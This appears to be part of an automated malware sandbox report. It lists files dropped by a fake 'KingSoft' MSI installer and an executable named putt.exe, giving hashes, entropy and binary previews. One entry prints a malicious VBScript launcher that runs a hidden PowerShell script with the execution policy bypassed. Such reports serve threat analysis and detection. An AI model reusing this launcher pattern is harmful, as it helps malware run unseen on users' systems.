                                                                                                                                                                                                                                                  Preview:.............6=*..[.g.....p.v.t*...c.....&.H[...&.g.....?e$.9.y....>X...8...)B..e...5....(...2d.+[.[...V......V.~Q.kkA.t.r.U].d.k.A..}..r.Je...EoOz....*.....g...x..*.{.v.~.a...b.....N.....IP.GN........AWP...@5..]...2.........8\y...pi....~........i.....'m...K...M./}1..[..;}..g... x./jI..6.e.... .w......i .\.OR w...v..1.1f.j...p.;..P\B.9...4.}V.W=.0....g...I.&~..T.I..Kd.+..z.5.eBS.>n.52j.Z....V+...!.p....^%........7U...^2.....Z.9...'..p.9..u.h.]x.6g/.h.....7.dQ.u.}.....Hu.>.oG..........@.;..x....\.S{)sH5Lb..I_&.......y6^...?x..k.l......@...J.U.{].!.o.../ ....E.u.a..B...|].d&mB.s.[....a0;.?...@...._...r...1.4.k.{..q..V..Z.]:....S[.ED.....<X.1.M.......q.O.r......' .EwzM`.R'C....HsV.\....2..b.i.dDK..s)G.r..n..O..O........&.#....)...,.$.+....VBd+........w).. 3C.\j..:.6{.G0.tb.......B..'Cr...*...2..u.t.......W.......u.;.b...-k....n.w$.R.Sy.A^S.][a4.?....#{j"..G.....G8X.>.:h..Q.|...n.r.I...(..2?..]]}..]......e$"#.!..).K.>..4.X.j

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Raising

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):914
                                                                                                                                                                                                                                                  Entropy (8bit):7.373547942480216
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:apAiuDh3JBqjx24pKGKQ6kJBljrn5w7UYkmfOjDb138Px:aBwPuKGPakfDb13g
                                                                                                                                                                                                                                                  MD5:A60A51A234B633C4C402189FF0FD558E
                                                                                                                                                                                                                                                  SHA1:501C84ED7488AB1E4BC90EB9356740B6AA0E3D4C
                                                                                                                                                                                                                                                  SHA-256:392DCA52A41ED530E2AE4D2FCB2E44936AC5F7E7557378E4B60D9A3A99A239F4
                                                                                                                                                                                                                                                  SHA-512:50423E9325BC43FCF47F3C57222F95F08E1B73738D9067B2CD91AE6638D8AFAEB756D17F83FC13003111F82B290323DF4DBBA2D6AC75F2FEFAFFF8081834F55A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:Q.#...2k.....,3.:;%.@.;,.x.a/....Uo....M.(.r..bPe...1...GX?_1..I0..E...0o0[1.0...U....BE1.0...U....GlobalSign nv-sa110/..U...(GlobalSign Timestamping CA - SHA384 - G4....FiP....p...MA.0...`.H.e.......-0...*.H......1...*.H........0+..*.H.....41.0.0...`.H.e........*.H........0/..*.H......1". .+...9+e..X.t...pa.R.V.q.G.M%J.0....*.H......./1..0..0..0... .... .mN'Tr.h.x.edg....e.......0s0_.]0[1.0...U....BE1.0...U....GlobalSign nv-sa110/..U...(GlobalSign Timestamping CA - SHA384 - G4....FiP....p...MA.0...*.H............>e}.l.jdX^...0...=..........X.@\....T.T...(....s.6.J.be....8Lf....k.Y...&..*.......=.80.X.k..!o.'.w.....qJ.....|....R...x.jS.C.^...ykRm...NVR...Yp..SQ..f......cA$..B..Kw......o.U3k......-|.....u.P.nD#......U.CS.].....h.A..........7..hS c..Q.r...B.@..i.U.[ko:E>....).S.....?.<R.....m..^,i...T....._.i......Q...u.....O.T.?=..$....+...o.{.PN..D..N...cp.A....P../.T.......

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Sky

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                  File Type:Windows Precompiled iNF, version 2.1, flags 0x2010001, unicoded, at 0x10102 "", at 0x7070709 WinDirPath, LanguageID 909, at 0x9090909 language
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):52224
                                                                                                                                                                                                                                                  Entropy (8bit):6.685645875413775
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:wpkzUWBh2zGc/xv5mjKu2IwNnPEBiqXv+G/UXT6TK:fQWf05mjccBiqXvpgf
                                                                                                                                                                                                                                                  MD5:7286492DA76FE467D675F4BC75A3B359
                                                                                                                                                                                                                                                  SHA1:410424D584323DF3FB8889BEED88E4165F523AAB
                                                                                                                                                                                                                                                  SHA-256:6A0534C1A06FC535E7D78FCECBA6519600D39FF0BCCC8D69010630C4484785E5
                                                                                                                                                                                                                                                  SHA-512:A23A7A9E4DA1CC30B0318267D1330C8B1C831D33889027107BAA6CEC9D3D13AE43D83A330BBFDE1DC8EB8D7998365746650EA476620B06620DE255A7738D8AB2
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:......................................................................................................................U..QS..U.VW.}.......3.....1L...C...............f;.......Bf;............f;.......Bf;............f;...:...Bf;...0........f;..."...Bf;.........}tj.....f;..........f;.tJ.....f;.t@..U........V........^......3.Bf;.........................3._^[..E.@P.....u...........r....v...v........}..........t......U...<SV.....W..]....f...M.f;.......j.Zjp.E.!....E.a...X.E......E.....f;}.......f..n..i...f..o.._...f;...V......;.........G.....]........[........t<..T..F.......1L..4F..t..A..7v"........j.Zf...M.jpf;.X..v..._^[..f.F......f#......f;.u......f;}...V.......j!Yf+.f..f..(.......E..P.E....p..E...YYj!Yf;.......f..#......f..%......f..'......3.M..E.......t .M...QP.M.Q.u....`..................E.f.}.jpX.......-......%...H.........H.........H..............f;.tVj"_...7.]..C.f;...r....]...Z........F.f;E.t.f;E................`v.jaX;.........F.....~....U...0...U.U.SV........3.

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Surgical

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):119808
                                                                                                                                                                                                                                                  Entropy (8bit):6.643983910910844
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:70Imbi80PtCZEMnVIPPBxT/sZydTmRxlHS3NxrHk:ObfSCOMVIPPL/sZ7HS3z4
                                                                                                                                                                                                                                                  MD5:73842ED2C144AB22A0301F7BF71250EB
                                                                                                                                                                                                                                                  SHA1:7848E86E6E92E040FB635377A4BB813E6877EC10
                                                                                                                                                                                                                                                  SHA-256:B63DDC5DD8120693477CB2BE869E65C077A92FD27B6B44815FA702C8A07F5F80
                                                                                                                                                                                                                                                  SHA-512:50A43C9577319BF43031DB61336DBE4731958AC24F2C878271E6108A85653C205E6D0B067450E17528FD6239747B2C0DD1243E2B553AD417CA3C032BE52AF2D8
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:.W.......u....9.u.[j..WX..Y..^_..]..(W..3.PPPPP.qV....U..SVW.=..M....?.t*.].S.6.u..P>.......u......<=t...t.....>.u.+......_..^[].+.......U..]......t.I.....#M.....%.#M......U..Q...L.3.E.W.}.;}.u....WV..S....t.......I....t....;u.u.;u.u....,;.t&....~..t.....t.j.......I...Y....F.;.u.2.[^.M.3._..8....]..U..Q...L.3.E.V.u.9u.t#...W.>..t.j.......I...Y....F.;E.u._.M...3.^.7....].j.h.L..N7...e...E..0.q\..Y.e...5..L.....35.#M...u..E.............X7......u.M..1.{\..Y..U.....E..M..E..E.E.P.u..E.P......]..U..E.H...t-...t....t....t....t.3.]..#M.]..#M.]..#M.]..#M.]..U..k.x'J...E...;.t..U.9P.t....;.u.3.]..U..Q.E.Pj..]...YY..]..U...u...#M..}z...u...#M..pz...u...#M..cz...u...#M..Vz..]..^Y......j,h.L...H..3.].!]...M.u.j._;...t5.F....t"H...t'H...uL.....t....t....~;....6V.........E..Y....]..u.........3V.....YY3.......u..2..........:S......2.M.E.e....t.j..Z..Y.M.e...E...e...E..t.....L.....3...M.......E.3......U.U..........u...t.j..Z..Yj...x..;.t....t....u#.C.

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Tvs

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):82944
                                                                                                                                                                                                                                                  Entropy (8bit):7.997399353180572
                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                  SSDEEP:1536:uy7xUhDP49yfwHwrMKzD0X8jRDq7qMpnYzDYGeawL72v7aEtI:576mwrRkX8tu7pYhLwLyv7pe
                                                                                                                                                                                                                                                  MD5:09616A6313080EC4B3845CF427AF1DC3
                                                                                                                                                                                                                                                  SHA1:86801BDA1D8CB25068D8841571E1A309930CEB7B
                                                                                                                                                                                                                                                  SHA-256:76483C788B2C26A70DCBDA07395412BCB0A83184B5D9806344FCFCD08DC847DE
                                                                                                                                                                                                                                                  SHA-512:52DF199B57E222A3F8990139B414E7FD51D2C034A2CD00BBD23BDF3B3A25D745F3241744BFD394E066785D1FFD6F20BA4EA656B516903732EF304A518993ED2D
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:^ .a....3..........4....p.Ver...".w....n...........h....H..ma*+.P..)_.&../.r..-..)X..BK...@....?q....@0CD.q.1.........NY....El[.Wc.6E.@.C....T.V.8[....?V.......4.b..X'..*'.M...\d....Vo.....t..to..t+....UX5.g...........n.Q{>&9....PsR.i.....Z. ,..T...^..=.....Yrm.......Nu.....8..rz..fq....`..?F...p...q..{#7pv....z.&4..._.Y..pa.}CZcU............~l2E8J.b.5J.b..s...n.oQGE.*W.f{.b..4\.\~....].l.7...B.......W1g.....8;.....Na....,.F.zA.... ...-....1@..HG.v-hq...S.Tb.Y.......4a.XTK...j.f.......9Y5...Pt......4..&).~..P.^C...8.0.-..F.kP%.W:.T."...*..{.<6....|uL..yV.A.p..hc..}..B...x..hP.0...h..H...z..Y[.`.....'|....i.........v..=.>.~H.'..'..+.jH^...zp....TcE..C.5.T.I..@...w../3..r...rr..`.xY..A.....Es.y..H.....`oC.....|'U.0{.u..+..0...Po.`WF.t..9;.>.A.E...=.Hk......#7^P...A..u......61...5..T.S...}.6....U.U..H5...,..3.qW.n..,^..U7...B....z.>...s.....C..B....R.:.7.....\..J..>...m...P.......Dv......._2.....]0A.@_G....$.f.4?.....C...M.W............5.Ao.

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0pk0ak01.yye.ps1

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m2qffvrg.aww.psm1

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mva2tddp.kja.ps1

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ufr2en5r.0rf.psm1

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\putt.exe

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):978099
                                                                                                                                                                                                                                                  Entropy (8bit):7.973423478278547
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24576:pwalP8xAuX4r2UW6hFgpnzmhmwMpG/lhX1/tnn2K2:5LWjcFDtv1/tnn2K2
                                                                                                                                                                                                                                                  MD5:27B18A5E8BDAA950AF93633A821C2BFA
                                                                                                                                                                                                                                                  SHA1:5763FB49A0DCDB77959CF503F008B6F863C1E92D
                                                                                                                                                                                                                                                  SHA-256:B9C936992C244AB9864CF92BFE3365F7316B306846A4827AA91740DA78DEE813
                                                                                                                                                                                                                                                  SHA-512:EEAA5CD8FF38655B8C4C1105D05862722B660E5EB2A9C74CC08D6EB3D5678BA8803ABD3D0F6CD62B3A385017C19373DA87BF0F1093A5AEAABAC8777FA0C2A144
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 37%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...(...B...8............@.......................................@.................................@...........V...........k...H....`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc...V...........................@..@.reloc...............f..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\runner.vbs

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                  Size (bytes):167
                                                                                                                                                                                                                                                  Entropy (8bit):5.055307851182349
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:j+qAHmFEm8nBKjDQBgSSJJLNytGQqPJH0cVERSHmRPt+kiE2J5xAI5NxpFVXBv:j+q9Nq8ssnytGQO0cA1wkn23f5NxpFzv
                                                                                                                                                                                                                                                  MD5:2ECB9BCAD465B5AD76C691F423E99F46
                                                                                                                                                                                                                                                  SHA1:AFB42509BE90ADBE88B88E8BC198696E58660808
                                                                                                                                                                                                                                                  SHA-256:71CE5A097B62D7BAD24DAD6F037BC305EDB30B5AFBCACE068F952EE985FEF038
                                                                                                                                                                                                                                                  SHA-512:4BAADB547DC4AB93D19D548B48F51B87A8F81C3ACBCB7DAC0395B0A09835D7C298AFB5181F1134F686EEFE1D99F285BC7049F2FC6101263D2462AB29862662E7
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Preview:Set objShell = CreateObject("WScript.Shell") ..objShell.Run "powershell.exe -ExecutionPolicy Bypass -File ""C:\Users\user\AppData\Local\Temp\11808.ps1""", 0, False ..

                                                                                                                                                                                                                                                  C:\Windows\Installer\625ebd.msi

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {2FA3CD4B-28FE-4C2B-80E4-DCE280079806}, Number of Words: 2, Subject: KingSoft, Author: SoftPortable, Name of Creating Application: KingSoft, Template: ;1033, Comments: This installer database contains the logic and data required to install KingSoft., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Mon Dec 16 18:53:38 2024, Last Saved Time/Date: Mon Dec 16 18:53:38 2024, Last Printed: Mon Dec 16 18:53:38 2024, Number of Pages: 450
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):2098688
                                                                                                                                                                                                                                                  Entropy (8bit):6.635963694120387
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:49152:ESmM8cU7Y4zG/knHeVdOEod5+1d7csiG/C:p4eYHeVdPod57
                                                                                                                                                                                                                                                  MD5:C1D7C466CF70F32CE2FD51609EA97FAB
                                                                                                                                                                                                                                                  SHA1:D7FA0337F01755188D74E1CA17D9DA89D36572DA
                                                                                                                                                                                                                                                  SHA-256:D10E2BE559191CCEF09F8B31C946FE09840F4C60374D44F6672663C53BA1431A
                                                                                                                                                                                                                                                  SHA-512:36EB43516222C9264F7F6F5D6A3A40FBC879A277C42FB8281DCF7D810192A5087A441B6B107BF9F2410FF9F19DBB68EBC4CA06125FEA67ADFEDBA1FCCB7367ED
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:......................>...................!...................................E.......a.......n.......................................C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R.......................................................................................................................................................................................................................................................................................................................................;...........!...3............................................................................................... ...+..."...#...$...%...&...'...(...)...*...1...,...-......./...0...4...2...:...>...5...6...7...8...9...D...<...m...=.......?...@...A...B...C...D...F.......G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                                                                                                                                                                                  C:\Windows\Installer\625ebf.msi

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {2FA3CD4B-28FE-4C2B-80E4-DCE280079806}, Number of Words: 2, Subject: KingSoft, Author: SoftPortable, Name of Creating Application: KingSoft, Template: ;1033, Comments: This installer database contains the logic and data required to install KingSoft., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Mon Dec 16 18:53:38 2024, Last Saved Time/Date: Mon Dec 16 18:53:38 2024, Last Printed: Mon Dec 16 18:53:38 2024, Number of Pages: 450
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):2098688
                                                                                                                                                                                                                                                  Entropy (8bit):6.635963694120387
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:49152:ESmM8cU7Y4zG/knHeVdOEod5+1d7csiG/C:p4eYHeVdPod57
                                                                                                                                                                                                                                                  MD5:C1D7C466CF70F32CE2FD51609EA97FAB
                                                                                                                                                                                                                                                  SHA1:D7FA0337F01755188D74E1CA17D9DA89D36572DA
                                                                                                                                                                                                                                                  SHA-256:D10E2BE559191CCEF09F8B31C946FE09840F4C60374D44F6672663C53BA1431A
                                                                                                                                                                                                                                                  SHA-512:36EB43516222C9264F7F6F5D6A3A40FBC879A277C42FB8281DCF7D810192A5087A441B6B107BF9F2410FF9F19DBB68EBC4CA06125FEA67ADFEDBA1FCCB7367ED
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:......................>...................!...................................E.......a.......n.......................................C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R.......................................................................................................................................................................................................................................................................................................................................;...........!...3............................................................................................... ...+..."...#...$...%...&...'...(...)...*...1...,...-......./...0...4...2...:...>...5...6...7...8...9...D...<...m...=.......?...@...A...B...C...D...F.......G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                                                                                                                                                                                  C:\Windows\Installer\MSI60C0.tmp

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1025128
                                                                                                                                                                                                                                                  Entropy (8bit):6.5991528155295684
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24576:KnknHeDU4dmI6Eepd5TsP1Ih0lhSMXlrcsiG/Ch:6knHeVdOEod5+1d7csiG/Ch
                                                                                                                                                                                                                                                  MD5:DE574F7F5256F98F356A2D620C4A2288
                                                                                                                                                                                                                                                  SHA1:1D57D182BB748170F5CEFB7ECF594B4998E113B8
                                                                                                                                                                                                                                                  SHA-256:E831A5AEBC7BD941FA815A9441E552A0BA699F9BD5454036A68CCBB42200353A
                                                                                                                                                                                                                                                  SHA-512:431F3EA61D23028E1C538AF3C808E7213D629615E3CB22B41D44715FF805323DA82880C35BC90FFFE95621132DAD96EAB5BFCC395863F167664A5666369D0D5B
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|r..8..8..8..H..4..H....(../..(..)..(..w..H.."..H..9..H.....8.....p..B..p..9..p...9..8.y.9..p..9..Rich8..................PE..L....*Xg.........."!...).....d......`........0............................................@A............................L......@....................j..h:..........p\..p....................].......[..@............0...............................text...j........................... ..`.rdata.......0......................@..@.data...@)..........................@....fptable............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Windows\Installer\MSI614E.tmp

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1025128
                                                                                                                                                                                                                                                  Entropy (8bit):6.5991528155295684
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24576:KnknHeDU4dmI6Eepd5TsP1Ih0lhSMXlrcsiG/Ch:6knHeVdOEod5+1d7csiG/Ch
                                                                                                                                                                                                                                                  MD5:DE574F7F5256F98F356A2D620C4A2288
                                                                                                                                                                                                                                                  SHA1:1D57D182BB748170F5CEFB7ECF594B4998E113B8
                                                                                                                                                                                                                                                  SHA-256:E831A5AEBC7BD941FA815A9441E552A0BA699F9BD5454036A68CCBB42200353A
                                                                                                                                                                                                                                                  SHA-512:431F3EA61D23028E1C538AF3C808E7213D629615E3CB22B41D44715FF805323DA82880C35BC90FFFE95621132DAD96EAB5BFCC395863F167664A5666369D0D5B
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|r..8..8..8..H..4..H....(../..(..)..(..w..H.."..H..9..H.....8.....p..B..p..9..p...9..8.y.9..p..9..Rich8..................PE..L....*Xg.........."!...).....d......`........0............................................@A............................L......@....................j..h:..........p\..p....................].......[..@............0...............................text...j........................... ..`.rdata.......0......................@..@.data...@)..........................@....fptable............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Windows\Installer\MSI619D.tmp

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1025128
                                                                                                                                                                                                                                                  Entropy (8bit):6.5991528155295684
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24576:KnknHeDU4dmI6Eepd5TsP1Ih0lhSMXlrcsiG/Ch:6knHeVdOEod5+1d7csiG/Ch
                                                                                                                                                                                                                                                  MD5:DE574F7F5256F98F356A2D620C4A2288
                                                                                                                                                                                                                                                  SHA1:1D57D182BB748170F5CEFB7ECF594B4998E113B8
                                                                                                                                                                                                                                                  SHA-256:E831A5AEBC7BD941FA815A9441E552A0BA699F9BD5454036A68CCBB42200353A
                                                                                                                                                                                                                                                  SHA-512:431F3EA61D23028E1C538AF3C808E7213D629615E3CB22B41D44715FF805323DA82880C35BC90FFFE95621132DAD96EAB5BFCC395863F167664A5666369D0D5B
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|r..8..8..8..H..4..H....(../..(..)..(..w..H.."..H..9..H.....8.....p..B..p..9..p...9..8.y.9..p..9..Rich8..................PE..L....*Xg.........."!...).....d......`........0............................................@A............................L......@....................j..h:..........p\..p....................].......[..@............0...............................text...j........................... ..`.rdata.......0......................@..@.data...@)..........................@....fptable............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Windows\Installer\MSI63A2.tmp

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
